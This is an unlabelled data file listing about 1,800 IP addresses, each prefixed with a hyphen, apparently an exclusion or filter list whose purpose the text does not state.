-77.81.120.252 -125.77.194.150 -23.224.245.8 -67.212.76.231 -85.117.34.131 -118.192.129.30 -130.211.226.239 -199.102.231.112 -120.26.211.53 -158.69.142.154 -199.195.119.37 -47.93.116.11 -101.201.233.123 -2001:4802:7800:1:bc4d:f3c4:ff20:6fd -182.75.131.138 -95.163.100.217 -87.98.188.250 -205.209.155.215 -195.154.62.126 -166.62.52.16 -124.42.73.84 -199.119.140.25 -218.57.170.123 -178.32.53.77 -149.210.175.92 -67.212.76.232 -5.187.3.123 -23.88.82.185 -144.217.93.244 -31.31.194.100 -13.76.101.247 -142.4.119.116 -167.114.194.198 -106.75.167.138 -23.88.95.167 -164.15.6.144 -172.246.101.36 -119.23.245.15 -23.225.89.220 -176.31.210.45 -183.182.87.38 -185.159.129.191 -188.116.12.73 -103.77.23.247 -46.37.185.228 -82.135.151.188 -39.106.38.3 -104.203.82.40 -185.43.220.234 -123.57.177.171 -35.189.191.138 -45.119.118.75 -216.104.35.77 -45.114.94.215 -149.56.151.159 -5.189.181.32 -142.91.95.233 -82.135.148.240 -184.173.65.110 -120.27.229.101 -120.24.212.49 -43.229.155.150 -49.212.169.25 -192.186.0.226 -103.77.117.34 -202.196.1.136 -144.122.54.221 -45.79.222.250 -45.114.94.106 -89.28.192.165 -153.122.21.137 -109.235.252.149 -66.70.223.78 -123.56.71.6 -23.224.115.231 -180.96.23.98 -188.116.12.103 -23.224.115.238 -37.230.116.18 -83.99.248.131 -13.228.164.52 -64.110.130.129 -46.254.19.180 -121.42.149.138 -23.244.241.70 -216.45.52.118 -139.196.149.87 -113.10.192.131 -45.63.84.106 -115.159.86.227 -41.160.234.106 -123.207.232.173 -139.196.33.110 -103.22.181.97 -119.29.37.46 -104.171.9.228 -23.225.113.252 -46.20.124.200 -119.23.74.89 -121.40.132.254 -120.25.144.233 -120.25.223.49 -72.1.245.102 -58.213.131.74 -64.120.123.216 -120.77.208.159 -45.77.244.120 -23.104.135.51 -69.30.223.101 -114.199.187.51 -23.253.56.161 -116.62.9.78 -176.31.138.32 -109.68.191.37 -52.90.150.23 -210.51.3.78 -23.225.113.177 -42.112.16.97 -195.161.162.26 -121.199.30.96 -23.88.82.28 -173.212.240.5 -37.187.64.195 -88.99.87.14 -13.124.27.234 -118.178.182.177 -45.77.19.77 -120.76.65.211 -62.182.58.42 -162.144.73.213 -121.196.204.136 -111.202.67.71 -23.244.190.200 -98.129.169.33 -60.249.179.95 -23.244.190.167 -45.118.148.74 -114.215.166.216 -145.239.122.54 -193.104.170.66 -104.128.238.174 -45.61.112.32 -192.99.170.185 -115.29.102.66 -183.24.219.19 -139.99.107.221 -145.239.82.216 -123.57.135.123 -139.196.175.220 -45.76.156.240 -204.197.246.250 -212.80.229.116 -92.43.113.78 -47.104.131.136 -120.27.138.135 -106.187.37.71 -200.129.138.100 -61.160.251.70 -144.168.73.138 -166.63.21.68 -103.209.184.101 -106.14.253.101 -216.245.198.42 -85.204.97.213 -52.204.49.72 -5.196.89.65 -52.1.174.191 -121.40.208.207 -103.74.175.154 -104.223.213.123 -139.199.22.160 -80.248.212.232 -173.209.53.181 -222.122.226.163 -139.99.8.161 -92.222.47.208 -185.195.24.43 -106.14.95.17 -45.79.134.158 -45.33.59.167 -129.121.28.240 -39.106.156.25 -158.69.19.206 -210.245.80.125 -89.33.8.166 -52.18.26.131 -121.40.94.158 -61.49.8.161 -72.1.245.26 -188.132.147.170 -123.206.185.116 -104.37.168.204 -202.181.24.200 -101.37.29.53 -123.207.66.146 -45.77.46.231 -103.254.126.150 -47.93.150.50 -67.227.234.215 -23.227.190.104 -47.92.114.167 -115.28.242.105 -52.201.69.23 -45.114.94.225 -119.23.55.233 -69.194.0.18 -109.169.86.166 -77.92.144.25 -104.168.147.220 -120.76.24.236 -142.91.95.109 -217.15.80.77 -54.157.52.163 -192.200.117.197 -185.72.156.67 -142.4.107.98 -185.174.28.122 -204.197.248.87 -132.148.134.209 -121.42.144.33 -45.33.116.106 -188.227.186.128 -198.50.227.164 -37.75.11.126 -120.38.46.68 -45.32.105.122 -119.28.138.161 -199.102.44.39 -185.174.31.207 -31.13.130.156 -87.252.5.12 -52.90.9.225 -166.63.21.88 -181.143.127.99 -192.80.147.209 -72.9.152.129 -52.77.89.62 -201.249.74.30 -172.80.1.229 -74.52.4.35 -114.55.228.179 -195.201.25.234 -213.42.210.54 -188.93.22.219 -45.32.25.160 -113.141.64.28 -104.207.44.89 -185.174.28.110 -112.124.8.71 -211.143.18.139 -151.80.169.148 -213.173.72.12 -107.182.226.95 -45.114.117.212 -164.132.238.193 -132.148.8.70 -149.56.99.174 -106.14.197.90 -69.59.180.89 -188.116.54.137 -188.116.54.137 -23.224.245.19 -118.190.33.205 -114.80.61.195 -37.123.99.188 -120.27.96.243 -50.116.107.183 -123.206.207.13 -139.196.4.23 -91.121.49.120 -129.150.74.250 -120.25.61.24 -176.31.16.59 -23.224.115.212 -164.52.150.235 -184.154.181.213 -104.203.82.239 -103.91.126.27 -212.34.46.35 -54.38.10.174 -69.175.18.43 -121.35.246.230 -133.130.101.122 -101.50.1.115 -1.52.48.154 -103.40.162.79 -54.199.187.102 -40.121.201.235 -162.144.88.53 -182.254.138.181 -87.106.65.68 -188.120.230.137 -209.123.237.154 -162.247.233.36 -45.252.249.111 -50.116.42.240 -58.49.120.22 -158.69.145.85 -192.169.224.21 -112.25.69.20 -120.25.147.133 -74.208.192.204 -118.97.213.60 -23.88.82.63 -79.137.76.219 -123.57.233.3 -213.246.108.207 -83.228.123.15 -121.52.220.157 -216.131.117.13 -94.23.89.168 -139.162.204.228 -139.196.41.232 -47.88.216.104 -37.187.74.158 -103.200.5.164 -125.212.221.166 -130.111.81.7 -185.174.29.212 -69.197.177.228 -153.122.26.67 -37.187.11.45 -112.124.3.167 -23.244.241.73 -23.224.115.112 -120.133.1.106 -218.202.134.84 -50.97.180.42 -185.114.192.36 -88.150.157.8 -31.222.161.54 -23.225.239.153 -39.104.71.171 -47.90.78.66 -36.111.202.94 -103.27.177.237 -158.69.237.46 -198.143.146.142 -123.206.54.204 -198.61.226.46 -121.42.229.106 -202.162.223.163 -108.166.89.10 -117.48.202.88 -118.31.164.250 -120.26.37.127 -172.247.51.51 -23.225.113.166 -223.167.110.71 -169.239.80.49 -103.230.120.243 -124.127.42.67 -115.218.63.88 -144.168.124.3 -220.73.163.75 -114.55.145.75 -67.228.171.239 -104.238.74.215 -169.54.214.74 -45.79.182.69 -178.32.59.104 -160.16.203.143 -183.61.146.132 -180.168.218.157 -67.227.221.96 -213.136.81.87 -23.224.244.48 -107.190.233.71 -112.74.28.177 -59.153.61.177 -158.69.0.100 -103.254.12.173 -23.225.89.212 -112.29.172.225 -52.72.139.53 -89.163.128.179 -121.162.44.31 -31.7.92.10 -101.37.12.71 -67.215.236.214 -190.202.40.11 -220.168.85.61 -204.16.116.69 -188.93.18.210 -201.21.195.23 -169.47.0.165 -202.99.199.157 -75.126.200.215 -185.171.24.77 -106.14.104.14 -221.122.93.44 -47.92.25.78 -96.126.105.104 -153.120.50.214 -23.225.89.181 -139.199.180.206 -222.92.179.176 -101.201.146.82 -103.230.120.244 -118.184.18.14 -104.207.44.103 -134.213.218.38 -104.238.171.146 -122.144.130.104 -210.14.72.56 -185.174.30.146 -119.29.176.143 -23.244.241.118 -5.79.64.69 -202.106.156.2 -45.79.163.48 -121.40.238.57 -78.111.97.162 -185.5.55.146 -23.244.190.110 -98.126.243.186 -23.225.239.194 -120.25.90.218 -222.186.175.68 -212.116.87.3 -173.232.149.164 -199.180.101.74 -23.244.241.222 -123.56.113.98 -23.225.89.185 -41.206.193.150 -195.88.208.153 -180.148.82.110 -54.250.126.238 -109.169.86.87 -107.180.71.232 -114.215.190.172 -104.155.203.132 -120.78.199.137 -153.122.107.212 -23.225.239.96 -112.78.10.254 -43.225.157.172 -153.122.35.79 -107.6.146.100 -121.42.145.79 -106.14.195.86 -119.29.63.75 -172.246.101.86 -124.172.117.240 -108.61.119.54 -23.244.190.86 -176.31.49.61 -79.143.178.42 -106.14.112.49 -139.199.73.68 -88.80.190.44 -118.184.0.124 -67.222.96.148 -142.91.95.64 -192.80.147.83 -187.62.217.51 -208.38.172.73 -45.61.114.30 -47.52.71.105 -121.43.107.187 -123.57.59.150 -23.229.227.165 -209.235.220.240 -154.126.133.36 -103.237.144.211 -142.4.107.217 -121.42.30.198 -222.255.167.20 -112.12.67.116 -23.225.239.139 -185.7.96.10 -82.135.151.112 -45.114.94.203 -58.84.55.121 -198.98.54.7 -123.56.148.76 -94.75.249.38 -180.153.58.245 -8.12.176.41 -142.91.95.74 -113.193.8.210 -103.71.153.184 -52.68.210.204 -45.77.169.212 -184.154.126.26 -46.148.192.61 -23.244.241.33 -23.224.115.250 -5.135.224.33 -144.168.73.137 -185.174.29.173 -144.168.70.131 -23.104.135.65 -144.168.74.133 -178.32.126.193 -122.10.116.214 -66.154.119.125 -104.238.160.15 -121.40.106.191 -84.200.229.146 -23.244.190.104 -45.76.176.31 -23.227.133.38 -103.71.236.109 -223.223.178.10 -89.108.86.36 -95.140.42.156 -220.226.189.77 -120.76.23.49 -109.169.86.239 -37.59.56.5 -92.243.27.167 -182.254.218.123 -23.245.142.250 -82.135.148.65 -23.245.142.253 -116.255.195.227 -54.37.181.250 -104.239.228.92 -23.88.58.106 -142.0.138.25 -202.97.183.28 -54.37.131.107 -192.30.164.96 -139.99.5.194 -173.212.205.148 -200.150.70.98 -108.167.175.1 -101.201.108.185 -185.171.24.106 -193.19.118.201 -45.79.5.47 -23.225.239.23 -121.40.169.123 -188.116.7.26 -125.212.233.134 -172.246.101.13 -173.236.115.198 -139.129.202.171 -142.4.103.100 -192.80.147.167 -148.251.76.39 -115.182.84.80 -120.77.213.209 -103.94.169.29 -31.166.109.53 -23.88.95.186 -106.187.92.211 -142.4.107.123 -100.43.152.126 -23.244.190.120 -103.215.83.178 -47.90.75.100 -47.91.222.74 -188.165.137.16 -67.222.13.178 -139.162.8.190 -173.214.162.66 -117.54.125.136 -119.28.52.49 -64.131.73.235 -45.114.94.148 -174.37.242.35 -47.94.84.43 -125.212.221.188 -158.69.93.61 -69.65.33.40 -120.26.65.203 -153.126.135.225 -185.42.175.66 -54.248.115.51 -185.61.150.204 -121.40.242.54 -5.39.27.176 -188.132.215.237 -77.92.144.22 -218.78.199.102 -64.237.40.68 -190.248.32.219 -95.163.77.2 -14.18.235.201 -119.29.6.64 -112.124.100.138 -112.132.152.133 -176.227.211.130 -5.160.219.5 -47.94.14.145 -192.163.253.227 -122.114.182.232 -103.200.5.180 -123.207.119.38 -112.66.89.241 -190.196.210.143 -175.168.60.29 -113.161.98.114 -198.154.249.225 -115.159.47.223 -23.225.113.47 -82.138.2.226 -153.125.234.26 -82.135.151.77 -183.14.78.44 -115.28.186.46 -91.109.11.73 -192.185.219.146 -45.77.182.84 -103.242.66.87 -185.174.29.227 -114.215.189.165 -196.21.144.3 -216.104.35.72 -195.49.254.226 -23.225.89.188 -192.162.112.15 -220.178.222.148 -79.137.37.175 -80.211.240.50 -43.230.128.219 -104.203.82.112 -192.232.199.202 -95.213.229.103 -23.253.174.94 -92.243.5.55 -123.206.93.118 -213.207.92.122 -110.173.186.51 -202.153.128.56 -122.227.83.74 -202.59.250.160 -109.73.168.245 -69.87.198.118 -185.12.124.76 -103.250.21.96 -47.94.42.103 -92.63.105.222 -209.123.33.183 -31.193.6.27 -45.77.164.224 -23.244.241.8 -188.130.244.33 -188.132.147.61 -198.54.124.18 -69.64.49.56 -23.225.113.174 -195.181.210.176 -72.1.245.8 -216.117.133.76 -103.216.188.85 -104.203.82.233 -67.212.88.243 -45.40.138.145 -103.63.109.191 -140.143.141.88 -50.7.169.10 -59.55.128.155 -198.55.102.164 -45.114.94.159 -160.16.98.149 -200.98.169.13 -118.89.16.61 -121.40.138.14 -159.8.107.136 -23.88.82.5 -121.43.175.169 -116.62.37.102 -183.81.160.167 -5.135.16.172 -190.57.226.86 -72.4.146.137 -120.25.175.192 -203.137.39.94 -59.86.160.106 -115.214.182.189 -202.58.243.8 -120.76.76.107 -124.173.116.209 -119.28.189.233 -45.32.110.231 -78.24.217.81 -66.254.176.66 -119.29.254.55 -47.88.221.98 -89.231.14.234 -139.224.30.220 -114.80.100.98 -47.52.97.17 -37.252.102.197 -116.255.163.13 -124.132.99.150 -13.71.112.224 -149.56.143.29 -139.224.118.222 -89.163.142.113 -106.14.63.239 -133.242.234.27 -142.4.103.90 -52.193.101.134 -81.18.201.170 -185.10.51.122 -5.101.61.196 -208.167.248.152 -125.67.68.5 -182.253.24.75 -116.196.116.138 -198.200.41.114 -115.159.37.185 -69.164.195.35 -210.51.2.48 -153.125.234.28 -94.76.227.181 -188.116.8.26 -27.152.28.40 -88.86.113.116 -104.207.52.99 -45.114.94.229 -104.165.44.112 -23.244.190.11 -123.207.48.190 -66.154.119.108 -210.245.21.132 -87.98.144.142 -45.79.195.65 -116.249.205.157 -103.37.167.63 -5.39.113.109 -123.206.45.12 -52.36.53.122 -173.243.117.131 -167.114.59.55 -118.24.105.13 -103.96.140.50 -107.165.11.119 -120.55.102.130 -190.180.107.30 -52.192.255.88 -31.171.251.170 -5.39.26.196 -180.149.78.119 -222.186.21.58 -54.90.171.156 -39.106.213.51 -62.210.116.199 -121.40.124.121 -45.76.152.94 -173.192.1.170 -74.86.126.225 -114.55.103.143 -116.255.216.202 -45.114.94.20 -77.79.92.14 -45.61.114.48 -178.63.82.215 -116.226.122.178 -119.29.162.168 -72.167.190.8 -54.153.48.99 -86.104.177.27 -182.123.104.105 -209.126.75.82 -52.76.166.174 -184.173.141.236 -114.215.43.25 -139.129.222.16 -212.32.245.194 -119.23.15.19 -72.251.210.22 -45.76.176.160 -120.26.3.3 -103.24.215.13 -122.226.221.26 -77.75.124.183 -37.187.198.130 -45.77.214.227 -94.177.249.8 -103.30.151.123 -194.176.119.87 -45.114.94.179 -142.4.119.98 -198.245.60.93 -54.208.54.210 -103.74.119.2 -115.28.47.19 -61.14.210.23 -50.116.14.141 -139.129.205.47 -23.234.7.141 -60.250.14.41 -172.246.101.62 -23.88.82.131 -119.23.204.71 -52.74.44.94 -54.251.117.73 -221.238.141.248 -112.132.215.60 -23.225.89.169 -209.68.59.145 -172.247.51.139 -54.249.8.81 -68.168.108.200 -74.86.126.226 -85.214.95.175 -115.231.183.66 -91.109.247.114 -37.252.120.76 -212.68.50.15 -23.225.196.236 -64.57.81.124 -35.161.88.87 -67.23.229.114 -23.225.89.78 -158.69.16.105 -42.121.126.190 -151.80.161.99 -103.234.37.24 -151.80.161.10 -118.190.15.222 -5.196.113.140 -150.129.42.137 -112.25.69.22 -120.25.76.36 -120.24.77.196 -37.59.214.51 -46.45.185.53 -45.117.42.66 -123.206.60.132 -14.152.77.218 -185.204.216.110 -103.16.130.181 -178.32.216.92 -45.126.122.136 -121.40.70.113 -104.207.52.106 -82.135.151.123 -123.57.59.177 -107.191.43.167 -47.93.119.207 -103.45.104.149 -172.247.51.246 -185.174.30.193 -91.193.165.214 -51.211.168.81 -167.114.48.58 -67.225.172.106 -185.41.185.143 -123.56.181.140 -74.208.68.181 -103.193.151.244 -114.55.134.41 -68.142.1.158 -139.99.107.188 -45.32.120.235 -183.49.85.232 -176.223.197.49 -34.229.216.62 -50.116.75.51 -216.51.128.36 -31.3.153.38 -188.120.243.246 -118.89.29.234 -118.89.29.234 -120.77.50.148 -50.22.44.121 -92.53.116.35 -45.32.162.13 -119.28.18.44 -45.252.249.129 -198.200.41.30 -52.79.138.42 -89.108.87.202 -54.158.66.130 -94.23.200.87 -47.92.119.166 -85.234.99.37 -43.229.155.151 -148.251.162.131 -70.35.206.186 -23.225.113.161 -110.80.20.149 -125.126.57.196 -109.169.61.133 -198.23.65.83 -51.254.153.52 -142.91.95.57 -23.244.241.88 -115.28.186.75 -59.52.242.83 -115.159.102.74 -117.158.215.60 -198.204.247.44 -61.161.177.6 -121.41.74.197 -195.14.21.118 -101.227.102.235 -113.9.157.29 -45.63.66.136 -115.29.185.251 -54.92.66.173 -167.114.54.87 -185.83.147.167 -54.38.103.39 -199.66.91.140 -45.61.112.19 -112.53.66.106 -209.123.33.184 -188.165.139.55 -132.148.89.240 -181.57.132.254 -37.187.88.59 -183.111.122.124 -96.30.8.73 -142.0.128.234 -185.174.30.190 -47.104.9.227 -107.180.85.177 -23.89.79.168 -14.146.94.73 -65.60.5.74 -45.32.107.6 -222.186.171.230 -114.55.84.194 -223.82.254.71 -82.135.151.147 -178.33.255.219 -217.16.28.74 -118.186.224.197 -89.43.67.107 -23.88.82.32 -120.25.194.155 -27.254.62.246 -211.144.87.138 -209.95.43.110 -115.29.167.178 -221.206.225.67 -169.48.200.188 -104.165.42.36 -207.58.147.103 -217.174.238.166 -173.214.169.107 -104.239.241.39 -65.60.28.163 -54.174.49.67 -84.193.22.30 -49.212.195.15 -23.88.82.80 -192.80.147.47 -108.178.20.226 -101.231.44.251 -74.52.4.36 -41.215.239.45 -5.178.86.22 -221.203.118.189 -198.200.41.71 -182.92.170.1 -221.226.105.164 -157.7.244.202 -50.57.48.129 -104.207.135.243 -213.152.180.212 -66.23.237.3 -81.169.142.102 -195.200.252.188 -104.207.52.78 -61.155.194.208 -23.244.241.147 -104.207.44.126 -120.25.232.21 -121.40.79.137 -119.29.14.219 -112.121.151.186 -142.91.95.144 -59.153.61.172 -23.244.241.76 -104.203.82.141 -94.156.185.37 -103.234.36.18 -222.122.226.165 -5.2.88.120 -143.95.101.190 -217.23.11.176 -111.67.192.166 -162.242.219.190 -45.76.127.187 -91.197.252.8 -114.55.113.5 -45.124.85.205 -101.200.230.173 -23.225.113.159 -132.248.83.82 -197.243.6.3 -155.254.34.127 -45.76.75.251 -86.104.177.36 -118.151.159.78 -167.205.32.46 -93.186.197.166 -162.144.64.170 -46.166.142.24 -119.82.105.228 -45.76.67.16 -45.76.151.57 -35.161.173.41 -173.249.7.78 -107.152.111.105 -46.166.142.228 -188.165.41.238 -185.174.30.130 -103.20.249.125 -121.199.3.92 -80.241.215.22 -45.252.249.112 -112.124.35.166 -121.196.202.137 -45.61.115.5 -112.73.84.233 -23.224.115.211 -69.195.222.148 -5.79.106.37 -23.253.200.222 -195.88.72.125 -120.24.161.206 -23.224.115.30 -174.34.144.107 -110.170.212.163 -169.55.30.205 -54.225.3.231 -200.170.87.6 -192.187.120.235 -115.159.55.171 -103.45.13.79 -95.213.223.126 -72.14.179.249 -116.255.222.6 -166.62.97.89 -39.106.128.226 -104.207.44.82 -121.40.45.114 -74.91.113.153 -23.224.115.126 -23.225.239.132 -192.80.147.229 -222.92.184.163 -164.132.67.81 -5.32.108.42 -27.156.124.19 -199.168.189.10 -185.27.134.135 -110.92.66.108 -192.99.47.57 -14.63.198.18 -39.108.103.105 -92.63.97.41 -192.154.110.2 -69.87.199.9 -166.63.21.72 -103.44.160.42 -172.247.51.52 -216.158.236.244 -207.20.231.26 -118.179.223.226 -54.159.191.131 -65.60.59.115 -162.13.178.189 -47.92.48.154 -185.165.240.161 -58.33.180.75 -178.33.11.226 -121.40.47.195 -80.241.245.26 -123.206.104.42 -109.73.168.228 -178.212.128.108 -178.32.163.118 -82.135.148.46 -69.169.88.84 -192.95.30.96 -218.244.135.92 -160.16.93.225 -122.152.221.97 -188.132.250.91 -112.74.135.210 -107.158.255.219 -173.208.201.106 -45.76.186.6 -120.76.192.34 -115.28.184.116 -120.24.57.80 -128.1.203.17 -118.178.129.156 -120.24.80.133 -45.114.94.145 -46.105.33.253 -123.206.95.174 -13.56.254.193 -34.207.123.93 -176.67.241.178 -93.91.112.3 -23.239.3.33 -188.225.80.215 -52.36.168.195 -172.247.51.128 -62.109.27.180 -119.28.20.214 -172.104.150.32 -103.101.52.30 -52.54.136.143 -178.212.41.244 -50.17.172.98 -23.225.89.250 -194.28.173.47 -88.204.230.205 -142.4.103.92 -189.80.20.214 -122.4.247.188 -172.246.101.105 -116.236.231.183 -121.43.188.68 -192.187.126.38 -101.132.139.202 -172.110.9.204 -23.225.113.218 -67.21.4.212 -23.225.113.208 -89.25.151.163 -86.104.177.64 -23.244.241.38 -5.135.178.82 -119.10.70.122 -103.80.238.165 -52.91.73.126 -218.61.32.99 -23.235.204.116 -192.99.114.189 -64.118.92.53 -74.208.72.12 -23.224.115.47 -35.200.14.219 -31.214.129.199 -23.225.239.135 -118.31.238.203 -103.16.63.163 -208.117.38.21 -65.19.143.206 -117.41.237.132 -120.55.85.160 -111.230.223.165 -112.74.167.122 -119.10.68.157 -123.57.88.103 -69.87.199.12 -103.42.178.123 -203.195.238.29 -54.167.159.65 -185.114.192.44 -217.16.8.13 -153.122.30.106 -45.56.123.69 -148.251.151.138 -104.203.82.89 -209.236.120.210 -121.42.141.43 -64.118.92.54 -78.111.82.111 -192.99.56.212 -106.37.240.18 -101.132.32.122 -82.135.151.232 -183.66.64.200 -120.79.193.82 -103.15.51.88 -198.16.54.230 -23.225.89.18 -5.196.8.130 -13.228.232.113 -104.203.82.139 -169.57.10.66 -199.21.149.29 -51.254.156.62 -123.207.153.94 -149.56.31.137 -193.70.50.67 -164.132.7.165 -162.144.111.169 -192.80.147.131 -173.212.214.143 -159.122.208.135 -47.92.153.237 -182.92.99.113 -121.40.179.35 -203.162.31.186 -209.116.209.249 -123.56.43.132 -207.254.52.182 -60.190.223.92 -199.245.214.176 -13.92.248.48 -67.23.39.74 -103.49.215.243 -51.254.61.237 -37.59.146.65 -142.91.95.178 -45.251.88.33 -23.225.89.8 -23.104.135.223 -121.41.60.93 -171.244.0.101 -50.63.155.54 -82.145.60.171 -65.60.43.172 -45.122.220.111 -109.202.15.196 -52.196.134.211 -103.55.25.22 -45.114.94.110 -107.183.17.173 -123.31.26.53 -198.27.104.74 -155.93.123.12 -172.104.85.216 -107.191.42.98 -39.109.123.128 -124.205.252.83 -176.223.197.44 -118.31.1.79 -203.162.13.107 -158.69.251.198 -93.84.112.249 -164.58.48.5 -23.225.89.42 -201.204.76.83 -104.238.236.116 -223.82.254.72 -120.26.114.136 -47.93.236.38 -195.19.241.235 -114.215.84.88 -202.53.163.106 -112.74.30.98 -203.160.94.170 -185.38.45.126 -157.7.161.42 -220.130.53.230 -103.75.101.40 -58.57.182.6 -120.77.38.125 -144.217.15.159 -149.71.103.35 -115.29.79.177 -120.76.161.200 -173.254.231.53 -142.44.249.67 -123.207.235.210 -185.29.122.99 -139.162.58.17 -184.154.181.196 -113.207.68.178 -122.225.105.138 -192.80.147.220 -123.58.61.135 -45.76.177.97 -185.85.75.4 -54.185.152.81 -219.151.38.194 -70.36.125.57 -101.37.160.62 -52.196.34.24 -173.82.153.16 -45.32.225.156 -172.110.27.208 -23.225.89.154 -185.82.223.97 -216.131.89.243 -66.154.119.160 -216.131.75.8 -23.224.115.37 -23.244.190.212 -116.62.128.51 -216.131.119.109 -172.110.5.224 -189.204.143.195 -116.236.231.176 -185.174.28.80 -151.248.121.135 -92.43.117.206 -118.31.39.86 -134.119.233.5 -120.55.96.145 -139.199.24.41 -122.155.0.190 -107.191.61.105 -212.87.23.248 -184.107.98.92 -147.52.110.5 -112.78.11.18 -205.166.94.31 -216.131.89.245 -88.150.157.244 -139.99.106.92 -203.162.79.142 -144.217.113.107 -198.24.170.58 -216.131.90.236 -202.123.80.91 -120.24.70.2 -39.104.60.174 -162.144.117.88 -173.243.113.179 -129.21.231.151 -116.196.123.124 -192.163.197.93 -23.225.113.58 -54.37.10.44 -89.31.150.232 -209.58.164.174 -59.148.253.221 -82.135.151.251 -91.241.66.195 -72.3.199.185 -166.62.85.138 -14.192.17.132 -114.55.86.125 -78.137.112.223 -184.171.240.164 -112.124.35.27 -52.204.213.64 -104.155.212.63 -103.200.5.100 -120.24.248.194 -74.117.154.198 -166.63.21.108 -119.23.216.36 -209.126.100.202 -104.207.50.116 -198.50.198.74 -79.137.119.87 -192.225.231.165 -66.55.75.253 -34.228.108.175 -54.164.243.13 -23.244.241.126 -82.135.151.210 -166.62.60.218 -112.78.136.250 -185.174.30.201 -107.180.71.185 -45.114.94.228 -116.236.231.203 -194.44.214.18 -106.186.17.173 -213.32.20.51 -221.2.144.87 -88.150.157.239 -5.189.183.86 -175.176.163.134 -82.135.151.120 -47.88.1.18 -139.196.45.186 -34.252.18.24 -5.189.181.119 -47.90.34.182 -103.84.89.195 -192.40.5.155 -69.50.196.246 -162.247.78.84 -216.131.89.242 -80.241.208.138 -94.130.207.3 -72.1.245.37 -23.244.190.164 -18.194.223.17 -166.62.103.159 -103.79.143.126 -167.114.178.213 -125.253.127.15 -203.162.79.140 -216.131.117.12 -119.28.27.18 -45.56.95.224 -45.77.86.152 -91.224.140.166 -42.112.17.22 -192.80.147.85 -47.94.208.131 -86.106.137.182 -198.27.77.169 -160.124.140.177 -23.244.241.237 -62.162.168.197 -69.65.56.185 -104.224.203.157 -139.138.128.214 -34.245.11.219 -8.28.152.245 -45.114.94.19 -192.40.4.44 -190.103.184.146 -216.131.78.201 -193.124.17.206 -185.10.48.49 -119.28.87.102 -123.124.79.210 -45.114.124.77 -120.77.58.78 -120.24.152.27 -18.220.124.231 -222.73.63.147 -23.225.239.61 -210.14.78.153 -45.33.91.136 -143.89.189.29 -45.114.94.232 -74.208.132.201 -185.46.8.15 -61.144.43.149 -185.73.178.20 -218.206.247.18 -104.207.50.84 -82.135.151.78 -185.82.220.110 -188.116.7.6 -207.38.89.232 -202.83.164.186 -123.206.15.207 -203.189.89.179 -72.251.207.170 -172.104.80.87 -104.199.169.128 -38.113.112.146 -72.52.131.41 -114.215.197.83 -23.88.158.109 -189.112.1.46 -176.223.197.38 -139.162.208.60 -125.253.116.246 -210.51.181.146 -95.138.161.215 -178.33.36.142 -23.104.135.176 -104.203.82.190 -66.119.12.185 -109.194.195.241 -104.250.132.234 -139.199.105.124 -34.209.79.136 -45.124.85.23 -195.211.102.168 -54.249.37.167 -23.104.135.217 -23.244.190.217 -194.28.23.253 -222.222.28.237 -104.207.40.174 -112.121.100.252 -46.41.137.54 -173.214.160.247 -61.56.212.103 -122.114.95.147 -188.165.242.158 -112.126.94.227 -112.126.94.227 -115.29.149.45 -5.196.8.2 -203.140.232.87 -210.115.36.112 -123.206.189.239 -36.255.84.11 -104.207.155.61 -69.65.3.239 -222.222.43.131 -89.249.26.252 -216.131.75.12 -119.28.133.124 -219.135.97.128 -82.223.12.243 -23.225.239.100 -109.73.168.252 -121.40.182.133 -216.131.114.189 -222.255.122.27 -60.205.211.224 -157.7.244.43 -193.45.5.39 -149.12.0.28 -185.4.228.34 -80.179.219.43 -49.212.211.49 -216.131.75.6 -216.131.86.198 -222.73.173.172 -162.214.24.117 -82.135.148.76 -101.200.55.227 -208.107.4.10 -123.31.17.94 -207.20.231.24 -54.69.122.81 -198.200.41.106 -201.249.203.39 -46.32.251.194 -208.52.131.134 -59.188.87.156 -45.124.85.206 -212.166.67.191 -66.85.41.237 -106.14.112.229 -216.131.117.14 -95.47.161.60 -169.244.148.12 -74.122.121.168 -46.105.62.81 -211.101.11.153 -107.155.118.109 -142.4.103.111 -58.118.140.29 -222.255.175.134 -85.236.153.224 -120.55.240.243 -112.196.167.217 -23.244.241.65 -58.252.60.6 -188.116.55.49 -52.21.158.202 -188.116.7.245 -150.95.145.140 -212.68.42.169 -205.186.159.62 -108.61.212.193 -36.7.130.57 -193.70.114.136 -204.44.66.130 -188.65.208.227 -35.187.238.219 -66.254.175.35 -23.225.239.186 -39.108.56.120 -82.135.151.211 -120.78.199.77 -210.211.105.162 -59.110.21.46 -120.24.248.213 -118.139.178.110 -123.30.128.187 -182.254.198.221 -123.30.240.120 -123.30.191.42 -123.30.157.244 -117.103.206.12 -123.30.128.176 -114.7.34.18 -123.30.139.26 -123.30.149.34 -123.30.189.230 -112.137.167.32 -45.33.105.55 -204.57.114.2 -5.196.197.134 -59.45.148.72 -50.62.43.198 -145.239.29.130 -177.43.243.125 -218.201.109.75 -207.20.231.29 -188.116.4.136 -203.81.161.8 -123.1.118.153 -195.211.84.238 -203.190.0.4 -195.16.90.25 -5.135.157.222 -142.0.129.19 -216.131.116.76 -200.74.240.35 -106.14.158.107 -210.140.47.110 -45.119.80.188 -187.174.252.245 -50.207.43.107 -101.226.241.92 -52.229.174.221 -188.116.2.32 -47.97.192.72 -209.73.140.23 -219.132.232.5 -101.201.208.248 -123.206.222.247 -61.172.246.61 -52.67.191.72 -45.76.186.247 -5.255.79.44 -23.88.82.124 -139.196.100.4 -190.152.39.3 -183.131.70.101 -109.168.111.239 -193.194.84.221 -172.247.51.49 -144.168.69.146 -123.30.130.130 -23.225.113.248 -78.22.228.250 -176.67.8.15 -119.81.3.196 -185.174.28.149 -117.27.138.175 -110.164.87.199 -118.193.136.221 -120.25.67.42 -41.206.194.98 -27.254.92.57 -182.92.240.198 -119.29.23.181 -50.28.79.144 -211.159.169.59 -45.32.120.164 -119.10.8.180 -120.27.132.207 -119.29.136.232 -82.179.63.168 -185.87.51.9 -104.203.82.215 -210.12.61.211 -198.57.164.4 -180.178.62.83 -45.114.94.220 -180.76.111.44 -114.246.68.32 -62.129.139.109 -161.202.10.157 -74.63.241.133 -178.33.15.68 -123.70.165.165 -61.147.125.60 -117.25.131.179 -23.104.135.169 -82.209.64.174 -111.90.173.90 -194.85.58.44 -218.108.15.70 -5.135.224.57 -103.56.156.143 -34.229.200.68 -125.67.235.60 -194.135.81.209 -49.74.252.32 -198.176.48.76 -106.187.89.71 -171.244.22.58 -18.196.234.108 -142.91.95.151 -54.95.10.127 -23.83.202.135 -65.18.113.65 -221.209.60.77 -23.88.82.4 -51.254.35.140 -95.213.136.91 -103.92.25.142 -147.135.194.111 -104.167.69.35 -163.43.31.95 -45.114.94.122 -121.40.228.143 -177.43.125.51 